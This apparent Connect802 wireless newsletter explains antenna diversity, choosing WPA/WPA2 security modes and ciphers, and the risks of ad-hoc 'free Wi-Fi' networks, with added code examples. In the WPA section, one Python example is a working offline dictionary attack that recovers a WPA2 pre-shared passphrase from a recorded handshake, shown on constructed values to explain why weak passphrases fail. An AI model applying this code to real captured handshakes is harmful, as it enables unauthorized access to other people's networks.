We recently encountered a wireless network whose administrator had attempted some creative problem solving. Clients in an outlying building needed wireless connectivity. An access point was already installed in the main building, near the outlying building. Wireless coverage in the outlying building was sporadic: almost there, but not reliable enough for day-to-day work. The administrator addressed the issue by replacing one of the access point's two antennas with a single "high-gain" omnidirectional antenna (actually an 8 dBi antenna), leaving the original antenna on the other connector.
A similar situation was encountered at a Highway Patrol station. The station had a wireless access point installed on the roof, with the intent of providing wireless coverage to parked patrol cars on either side of the building. The administrator had installed two Yagi directional antennas on the access point, each one pointed towards an opposite side of the building.
In both cases, network connectivity was sporadic. It would occasionally drop for no obvious reason, and data rates were much lower than they would normally be.
Why was performance bad? 802.11b and 802.11g access points have two antennas for a specific reason: diversity. Because of a phenomenon called multi-path fading, signal strength can sometimes differ by a significant amount over just a few inches of space. Installing two antennas, separated by a few inches, on the access point, allows the access point to compensate for multi-path fading. When a transmission is detected by one antenna, the access point momentarily listens on the other antenna, and then chooses the antenna that has the strongest signal strength. This is known as receive diversity. When the access point transmits a packet, it can’t know which antenna will produce the strongest signal strength at the client, so it usually just transmits on the same antenna from which it last received data.
A key assumption behind diversity is that both antennas cover roughly the same physical area. For 802.11 to work correctly, each device must be able to detect when other devices are transmitting (carrier sense). When both of the access point's antennas are identical, that condition is met: whichever antenna is currently selected will detect that a transmission is under way, and the access point then switches to whichever antenna receives it with the stronger signal.
When two different antennas are installed on an access point, this condition is not met. Each antenna “covers” a different physical area. Because the access point only listens on one antenna at a time, it might totally miss the fact that a packet is being received by the other antenna. Because the access point only transmits on one antenna at a time, it might accidentally send a packet out the “wrong” antenna, causing the client to miss the packet entirely.
This explains what was going wrong in the two wireless networks described in the beginning of the article. In one case, the access point had two omnidirectional antennas, but one was higher-gain than the other. When the access point used the higher-gain antenna, clients in the outlying building got excellent connectivity, but when the access point happened to be using the lower-gain antenna, connectivity to the outlying building suffered. Why would the access point use the lower-gain antenna if the higher-gain antenna should have always had higher signal strength? Remember that multipath fading can cause significant changes in signal strength—possibly enough to outweigh the difference in antenna gain between the low-gain antenna and the high-gain antenna. With the highway patrol station, the situation was even worse. The two antennas were directional, and were pointed in opposite directions. Their coverage areas were not even remotely similar.
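To put a number on the mismatched-gain case, here is an added example (our own Python, not part of the original article) that simulates selection diversity on two antennas whose mean received powers differ by their gain difference, with an independent Rayleigh (multipath) fade on each. The 8 dBi figure is the one from the story; the 2 dBi figure for the access point's stock antenna is an assumption. Because each faded power is exponentially distributed, the chance that the lower-gain antenna wins has a closed form, which the simulation checks, and the transmit-side function shows the penalty the client pays when the access point sends on the antenna that last won receive diversity.

```python
import math
import random


def db_to_linear(db: float) -> float:
    """Convert a dB ratio to a linear power ratio."""
    return 10.0 ** (db / 10.0)


def rayleigh_power(rng: random.Random) -> float:
    """One sample of received power under Rayleigh (multipath) fading,
    normalised to mean 1: |h|^2 with h a unit-variance complex Gaussian."""
    i = rng.gauss(0.0, math.sqrt(0.5))
    q = rng.gauss(0.0, math.sqrt(0.5))
    return i * i + q * q


def _hi_lo(gain_a_dbi: float, gain_b_dbi: float) -> tuple:
    a, b = db_to_linear(gain_a_dbi), db_to_linear(gain_b_dbi)
    return max(a, b), min(a, b)


def wrong_antenna_fraction(gain_a_dbi: float, gain_b_dbi: float,
                           frames: int = 50_000, seed: int = 1) -> float:
    """Fraction of received frames on which receive diversity selects the
    LOWER-gain antenna, i.e. the fade on the high-gain antenna was deeper
    than the gain difference.  Assumes independent fading per antenna."""
    rng = random.Random(seed)
    hi, lo = _hi_lo(gain_a_dbi, gain_b_dbi)
    wrong = 0
    for _ in range(frames):
        if lo * rayleigh_power(rng) > hi * rayleigh_power(rng):
            wrong += 1
    return wrong / frames


def wrong_antenna_probability(gain_a_dbi: float, gain_b_dbi: float) -> float:
    """Closed form of the same quantity.  With independent exponential powers
    of means m_hi and m_lo, P(m_lo*Y > m_hi*X) = m_lo / (m_hi + m_lo)."""
    hi, lo = _hi_lo(gain_a_dbi, gain_b_dbi)
    return lo / (hi + lo)


def client_outage(gain_a_dbi: float, gain_b_dbi: float, margin_db: float,
                  frames: int = 50_000, seed: int = 2) -> tuple:
    """Transmit side.  The AP sends each frame on the antenna that last won
    receive diversity (the behaviour described above).  A frame is an outage
    when the client's received power drops more than margin_db below the
    unfaded mean through the high-gain antenna.  Returns
    (outage with the mismatched pair, outage if the AP always used the
    high-gain antenna), computed on the same fades for a fair comparison."""
    rng = random.Random(seed)
    hi, lo = _hi_lo(gain_a_dbi, gain_b_dbi)
    threshold = hi * db_to_linear(-margin_db)
    mismatched = always_hi = 0
    for _ in range(frames):
        # receive diversity decides which antenna the next transmission uses
        tx_gain = hi if hi * rayleigh_power(rng) >= lo * rayleigh_power(rng) else lo
        fade = rayleigh_power(rng)          # fresh fade on the downlink
        if tx_gain * fade < threshold:
            mismatched += 1
        if hi * fade < threshold:
            always_hi += 1
    return mismatched / frames, always_hi / frames


if __name__ == "__main__":
    print(f"lower-gain antenna chosen: {wrong_antenna_fraction(8, 2):.3f} "
          f"(theory {wrong_antenna_probability(8, 2):.3f})")
    print("client outage at 10 dB margin (mismatched, always high-gain):",
          client_outage(8, 2, 10))
```

With an 8 dBi antenna paired with a 2 dBi one, the lower-gain antenna wins receive diversity on about one frame in five, and at a 10 dB fade margin the client's outage rate rises by roughly half compared with always transmitting on the high-gain antenna. Two identical antennas would make the gain difference zero and the selection a genuine improvement rather than a coin toss weighted against the outlying building.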
So what’s the right thing to do if you want to install external antennas on an access point? One option is to purchase two of the exact same antenna and attach one of them to each of the access point’s antenna connectors. If you do this, be aware that the two antennas must be installed at a specific distance from each other in order for diversity to work properly; they can’t just be plugged in and installed any-which-way.
A second option is to purchase an antenna that has diversity built in. This antenna will have two connectors that plug into your access point. Inside the antenna’s housing are two separate antenna elements that implement diversity. This type of antenna allows you to have increased antenna gain without giving up diversity and without the extra mounting complexity that comes from using two separate external antennas, as in the first option.
A third option is to give up diversity entirely and just use a single antenna. This might sound like a bad option, but in many cases, it’s the most effective one. Multipath fading is not a problem in some environments, such as certain point-to-point links. In cases like this, just connect the external antenna to one of the access point’s antenna connectors and connect no antenna to the other antenna connector. The access point will need to be told that it only has a single antenna, or it will try to do diversity between the two connectors even though one of them doesn’t have any antenna at all. You can configure most access points to use either the “left” or the “right” antenna connector. The default configuration is usually “auto” or “diversity” (same function, different name). If you install an external antenna, configure the access point to only use the antenna connector to which the external antenna is attached.
Antenna selection dialog box from an access point. The TX (transmit) antenna is set to "Auto", which means diversity is enabled. Do not attach a single external antenna to this access point without reconfiguring it as described in the text.
Finally, keep in mind that 802.11n also uses multiple antennas, but it does so in a fundamentally different way than 802.11b and 802.11g. 802.11n uses all antennas at the same time. Does this mean that we won’t be able to use external antennas with 802.11n access points? Will we have to buy multiple antennas for each access point if we want to take advantage of 802.11n’s higher speeds? This remains to be seen.
By now, you probably know that WPA and WPA2 are both excellent choices for wireless security. WPA can be configured to run in several different modes. This month, we’ll help you decide which WPA mode is right for your network.
Security selection modes in a popular access point. Most access points have modes that are similar to this.
The graphic above shows the security mode selection menu from a popular access point. “Disable,” the first option, would only be used in an open wireless network, and won’t be discussed further. “WEP”, the last option, probably doesn’t provide enough security for most networks, and should be avoided if WPA is available, which it is, so we won’t discuss it any further either.
The remaining modes consist of a combination of several factors:
WPA vs. WPA2. WPA was the security standard released by the Wi-Fi Alliance prior to the ratification of the 802.11i standard. WPA2 was the security standard released by the Wi-Fi Alliance after the ratification of 802.11i, and WPA2 and 802.11i are essentially synonymous. WPA2 provides certain security and performance enhancements over WPA, the most significant of which is the option to use AES encryption (the CCMP cipher suite) instead of the TKIP encryption used by WPA.
Pre-Shared Key vs. RADIUS. In Pre-Shared Key mode, the access point is configured with a passphrase, a string of text, and every station must be given the same passphrase before it can connect. In RADIUS mode, also known as Enterprise mode, the access point and the station collaborate to authenticate the station (by user name and password, or by certificate) via a RADIUS server, and each station's keys are derived from a per-session master key rather than from one shared secret. RADIUS mode can be more secure and easier to administer, but it requires a RADIUS server, which small businesses and home networks seldom care to afford and maintain. Pre-Shared Key mode is much simpler, but somewhat less secure and harder to administer: the single passphrase is known to every user, so it has to be changed on every device whenever someone who knows it leaves, and a short or guessable passphrase can be recovered offline by anyone who records a station's connection exchange.
Mixed vs. Only. Some devices do not have the hardware, firmware, or drivers to support WPA2. Fortunately, the 802.11i standard (which is functionally equivalent to WPA2) defines backwards compatibility functionality, whereby a WPA2 access point can support WPA clients. If the access point is configured to a “Mixed” setting, then both WPA2 and WPA clients will be allowed to connect. In an “Only” setting, only WPA2 clients will be allowed to connect.
Picking the best option from these modes is not too difficult. Since WPA2 includes backwards compatibility for WPA clients, there isn't much of a reason to choose one of the "WPA" settings: a WPA-only access point simply denies WPA2-capable clients the stronger encryption. If you're concerned about WPA clients being able to connect, choose one of the "WPA2 Mixed" settings, and the access point will handle both WPA and WPA2 devices. Even if you only have WPA clients today, WPA2 will be enabled on the access point in case a WPA2 client comes along, and the WPA2 client will negotiate the stronger encryption and authentication on its own.
Pre-Shared Key vs. RADIUS is also relatively simple. For home and small to medium office installations, Pre-Shared Key is likely to be the only option, since these sites probably won't have a RADIUS server. Larger enterprises probably already have a RADIUS server and will want to take advantage of the increased security and central administration that it offers. Small network administrators do have some options if they want to use RADIUS mode instead of Pre-Shared Key. Free RADIUS server software is available for Linux and for Windows. Also, some vendors have begun to target the small and medium business Wi-Fi authentication space with rudimentary RADIUS server software designed specifically to support 802.11 authentication. These programs tend not to have as many bells and whistles as their full-featured counterparts, but they're also much cheaper and easier to maintain.
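The reason Pre-Shared Key mode is described above as "somewhat less secure" is worth seeing in code. The following is an added example written for this page (not code from the original article or from any access point vendor). It implements the key derivation that 802.11i specifies for Pre-Shared Key mode: the passphrase and SSID are stretched into the PMK with PBKDF2, the PMK and the MAC addresses and nonces exchanged in the clear are expanded into the pairwise key, and the first 16 bytes of that key authenticate the handshake messages. Everything except the passphrase is visible to anyone who records the exchange, so passphrase guesses can be checked offline, which is what the last function does against a constructed wordlist. The MAC addresses, nonces, SSID and EAPOL frame bytes in the demo are stand-ins, not a real capture.

```python
import hashlib
import hmac


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """802.11i pre-shared key: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096, 32).
    The SSID is the salt, so one passphrase gives a different PMK per network."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("utf-8"),
                               ssid.encode("utf-8"), 4096, 32)


def prf(key: bytes, label: bytes, data: bytes, nbytes: int) -> bytes:
    """802.11i PRF-n: HMAC-SHA1(key, label || 0x00 || data || i) for i = 0, 1, ..."""
    out = b""
    counter = 0
    while len(out) < nbytes:
        out += hmac.new(key, label + b"\x00" + data + bytes([counter]),
                        hashlib.sha1).digest()
        counter += 1
    return out[:nbytes]


def ptk_from_pmk(pmk: bytes, ap_mac: bytes, sta_mac: bytes,
                 anonce: bytes, snonce: bytes) -> bytes:
    """Pairwise transient key for CCMP (384 bits) from the values that travel
    in the clear during the 4-way handshake.  Bytes 0-15 are the KCK that
    protects the handshake messages themselves."""
    data = (min(ap_mac, sta_mac) + max(ap_mac, sta_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    return prf(pmk, b"Pairwise key expansion", data, 48)


def eapol_mic(kck: bytes, eapol_frame: bytes) -> bytes:
    """WPA2 (AES) key MIC: first 16 bytes of HMAC-SHA1 over the EAPOL-Key
    frame with its MIC field zeroed.  (WPA/TKIP uses HMAC-MD5 here instead.)"""
    return hmac.new(kck, eapol_frame, hashlib.sha1).digest()[:16]


def guess_passphrase(candidates, ssid, ap_mac, sta_mac, anonce, snonce,
                     eapol_frame, observed_mic):
    """Offline dictionary check: derive the KCK for each candidate and see
    whether it reproduces the MIC seen in the recorded handshake.  No
    traffic to the access point is needed.  Returns the match or None."""
    for candidate in candidates:
        kck = ptk_from_pmk(pmk_from_passphrase(candidate, ssid),
                           ap_mac, sta_mac, anonce, snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, eapol_frame), observed_mic):
            return candidate
    return None


def demo() -> str:
    """Constructed handshake (stand-in values, not a capture) protected by a
    weak passphrase, then recovered from a four-word list."""
    ssid = "EngineeringOffice"                       # constructed
    ap_mac = bytes.fromhex("0200000000a1")           # constructed
    sta_mac = bytes.fromhex("020000000b02")          # constructed
    anonce = bytes(range(32))                        # constructed
    snonce = bytes(range(32, 64))                    # constructed
    eapol = b"\x01\x03\x00\x5f\x02\x01\x0a" + bytes(88)   # stand-in frame, MIC zeroed
    real_kck = ptk_from_pmk(pmk_from_passphrase("sunshine1", ssid),
                            ap_mac, sta_mac, anonce, snonce)[:16]
    observed_mic = eapol_mic(real_kck, eapol)        # what the recorder saw
    wordlist = ["password", "letmein", "sunshine1", "correct horse battery staple"]
    return guess_passphrase(wordlist, ssid, ap_mac, sta_mac, anonce, snonce,
                            eapol, observed_mic)


if __name__ == "__main__":
    print("recovered passphrase:", demo())
```

The 4096 PBKDF2 iterations slow each guess down, but they do not stop a guess list from being run through at leisure, which is why a pre-shared passphrase should be long and random rather than a word with a digit on the end. In RADIUS mode the master key is produced by the authentication exchange instead of being derived from a passphrase, so there is nothing comparable to guess.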
Most administrators will probably prefer "Mixed" settings to "Only" settings. Unless you're 100% sure that no WPA-only clients will need to connect, it's best to leave the access points set to "Mixed" WPA/WPA2. The network from which these screenshots were taken was originally set to "WPA2 Only" (the network administrator later reported that excluding WPA devices was done largely out of a misplaced sense of elitism rather than any security concern). This worked fine until a guest visited the office and mysteriously couldn't connect. The problem was eventually traced to the fact that the guest's wireless card and drivers supported only WPA, not WPA2.
The network from which these screenshots were taken currently uses the “WPA2 Pre-Shared Key Mixed” setting. The site is a regional office of a small engineering firm. All of the firm’s computers use WPA2, but “Mixed” is enabled in case guests bring computers that only support WPA. Pre-Shared Key is used because the firm does not yet need, nor have the IT resources to support, a RADIUS server.
Selecting the encryption algorithm
The graphic above shows an additional setting that is available: the encryption algorithm that the device should use. Two options are present: TKIP and AES. As was mentioned above, WPA uses TKIP encryption, whereas WPA2 has the option of using either TKIP, AES, or both. The three options in the menu above correspond to those three settings.
As you can see in the graphic, the access point has been configured to use WPA (in the “Security Mode” pull-down menu), but note that AES is still an option in the “WPA Algorithms” menu! Some manufacturers allow the use of WPA with AES encryption, but you should realize that this is a non-standard option and might not work with all devices. The WPA standard allows for the use of TKIP and WEP encryption. AES was only added with WPA2. Therefore, in order to ensure maximum compatibility, we should not configure the access point to use AES encryption with WPA. We should only configure the access point to allow AES if the security mode is set to WPA2.
If "WPA2 Pre-Shared Key Only" or "WPA2 RADIUS Only" mode is used, then AES is the correct choice for the encryption algorithm. The "Only" setting prohibits WPA clients from connecting, so there is no need to support the weaker TKIP encryption. As discussed in the previous paragraph, if the network is using WPA only, then "TKIP" is the right choice, for compatibility reasons. If both WPA2 and WPA are available (the access point has been configured to a "Mixed" setting), then "TKIP + AES" is the right choice. This will allow WPA2 stations to use the stronger AES encryption while WPA stations use TKIP. Remember that "Mixed" keeps the weaker TKIP cipher enabled for as long as it is set, so revisit the setting now and then and move to "WPA2 Only" with AES once the last WPA-only device is gone.
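The same choices expressed in a vendor-neutral form, as an added example (not from the original article or from the access point pictured): the fragments below use the configuration keys of hostapd, the open-source access point daemon, where the security mode and the cipher list are separate settings in exactly the way the article's menus are. The SSID, passphrase placeholder and RADIUS server address are made up for illustration.

```conf
# Fragment 1: "WPA2 Pre-Shared Key Mixed" with "TKIP + AES" (the setting used at the site above).
# wpa is a bit mask: 1 = WPA, 2 = WPA2, 3 = both ("Mixed").
interface=wlan0
ssid=EngineeringOffice
wpa=3
wpa_key_mgmt=WPA-PSK
wpa_passphrase=replace-with-a-long-random-passphrase
# ciphers offered to WPA clients
wpa_pairwise=TKIP CCMP
# ciphers offered to WPA2 clients: AES-CCMP only, so WPA2 stations never fall back to TKIP
rsn_pairwise=CCMP

# Fragment 2: "WPA2 Pre-Shared Key Only" with "AES". No WPA clients, no TKIP anywhere.
wpa=2
wpa_key_mgmt=WPA-PSK
wpa_passphrase=replace-with-a-long-random-passphrase
rsn_pairwise=CCMP

# Fragment 3: "WPA2 RADIUS Only" with "AES". The passphrase disappears; stations are
# authenticated through 802.1X against a RADIUS server (FreeRADIUS, for example).
wpa=2
wpa_key_mgmt=WPA-EAP
rsn_pairwise=CCMP
ieee8021x=1
auth_server_addr=192.0.2.10
auth_server_port=1812
auth_server_shared_secret=replace-with-a-long-random-secret

# The non-standard combination warned about above, "WPA" with "AES", would be
# wpa=1 together with wpa_pairwise=CCMP. hostapd will accept it, but not every
# WPA-era client will, which is the compatibility problem the article describes.
```

Only one of the three fragments would appear in a real hostapd.conf; they are shown together so the mapping from menu setting to configuration key is visible side by side.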
Although the terminology of this access point is not universal, the basic options shown here are present on most access points in some form or another:
"Should the access point use WPA or WPA2?"
"Should the access point use Pre-Shared Key or RADIUS mode?"
"If WPA2 is used, should the access point allow backwards compatibility with WPA clients?"
"Which encryption algorithms should be used?"
… and now you should know what you need to know in order to answer those questions.
Below are links to some of the RADIUS server software that was mentioned in this article. Connect802 provides these links for reference only. We do not endorse or support any of these programs.
FreeRADIUS, an open-source, free RADIUS server (Linux and other UNIX variants only)
WinRadius, a free RADIUS server for Windows (specifically mentions 802.11 compatibility)
Elektron, a commercial RADIUS server targeted at small offices
Recently, I was in an airport, and I saw a wireless network called “Free Public Wi-Fi”. I was suspicious because the signal strength was very low, and I don’t think that the airport actually had free public Wi-Fi. What’s your opinion? Was this network legit?
An “Available Wireless Networks” screen showing a “Free WiFi” network. Legit or not?
An example of such a network is shown in the screen above. The Expert recommends against connecting to such a network in most cases. Notice that the icon to the right of the network indicates that this is an ad-hoc, or “computer-to-computer” network. This means that the device advertising the network is not an access point. It might be a laptop belonging to an attacker who is hoping to lure victims in with the promise of free network access. Once you connect, it’s like plugging a crossover cable in between your two machines, and any vulnerabilities in your system are the attacker’s to exploit.
Could this just be someone trying to share his or her network access? Sure. Once you’ve bought your way onto the airport’s for-pay system, you could elect to use Windows’ Internet Connection Sharing to share that connection with others. This would require some technological knowledge, but it’s definitely doable. There are also some plug-in appliances that automatically share your wireless connection. But The Expert is wary about whose networks he jumps onto, and he’d rather spend a few dollars for access via the airport’s network than risk an attack from an unverified network.
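The icon the Expert points to is the operating system's rendering of two bits in the beacon frame that every wireless network transmits: the ESS bit, set by an access point, and the IBSS bit, set by a computer running an ad-hoc network. The Privacy bit in the same field says whether the network demands WEP, WPA or WPA2. Here is an added example (our own Python, not from the original column) that parses those bits and the SSID out of a beacon frame body and turns them into the advice given above; the beacon bodies it builds for itself are constructed for illustration, not captured frames.

```python
import struct


def parse_beacon_body(body: bytes) -> dict:
    """Parse the fixed fields and SSID element of an 802.11 beacon frame body
    (the part after the 24-byte MAC header).  Capability bits: 0 = ESS
    (access point), 1 = IBSS (ad-hoc), 4 = Privacy (encryption required)."""
    if len(body) < 12:
        raise ValueError("beacon body too short for fixed fields")
    timestamp, interval, capability = struct.unpack_from("<QHH", body, 0)
    info = {
        "timestamp": timestamp,
        "beacon_interval_tu": interval,
        "ess": bool(capability & 0x0001),
        "ibss": bool(capability & 0x0002),
        "privacy": bool(capability & 0x0010),
        "ssid": None,
    }
    pos = 12
    while pos + 2 <= len(body):               # tagged information elements
        tag, length = body[pos], body[pos + 1]
        value = body[pos + 2:pos + 2 + length]
        if len(value) < length:
            raise ValueError("truncated information element")
        if tag == 0:                          # element ID 0 = SSID
            info["ssid"] = value.decode("utf-8", errors="replace")
        pos += 2 + length
    return info


def classify(info: dict) -> str:
    """The column's advice, derived from the capability bits."""
    if info["ibss"] and not info["ess"]:
        return "ad-hoc: another computer, not an access point; do not connect"
    if info["ess"] and not info["privacy"]:
        return "open access point: no link encryption; assume traffic is visible"
    return "infrastructure access point with encryption"


def make_beacon_body(ssid: str, capability: int, interval: int = 100) -> bytes:
    """Constructed beacon body for demonstration (not a real capture)."""
    fixed = struct.pack("<QHH", 0, interval, capability)
    ssid_ie = bytes([0, len(ssid)]) + ssid.encode("utf-8")
    rates_ie = bytes([1, 4, 0x82, 0x84, 0x8B, 0x96])   # Supported Rates 1, 2, 5.5, 11 Mb/s
    return fixed + ssid_ie + rates_ie


if __name__ == "__main__":
    for name, cap in (("Free Public Wi-Fi", 0x0002), ("Airport", 0x0001), ("Office", 0x0011)):
        info = parse_beacon_body(make_beacon_body(name, cap))
        print(f"{info['ssid']!r}: {classify(info)}")
```

A packet capture tool will show the same bits decoded under the beacon's capability information field, so the check does not depend on which icon a particular operating system chooses to draw.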
Intel Modifies Wi-Fi, Increases Range Dramatically
This month, Intel announced that it had developed a modification to standard 802.11 hardware. The modification is claimed to increase range up to 100 kilometers, or about 60 miles. Typical Wi-Fi hardware has ranges of only a few miles at most, and typically only hundreds of feet. Even more remarkable is the fact that the modification is accomplished using off-the-shelf 802.11 hardware. One caveat is that the links must be directional, so high-gain antennas are probably a requirement. The technology is intended for developing countries. A trial in Uganda is planned for later this year.
At Connect802 we're your PAGE ONE resource for wireless networking!
Connect802 has the experience, expertise, and resources to help you with your wireless network system. Use your favorite search engine and see what Connect802 is doing. Each month we give you some suggested search terms for you to explore. Here's this month's list. As you look down the search engine results you'll find Connect802 either at the top, or on the first page (true for Google and Excite, unknown for the rest).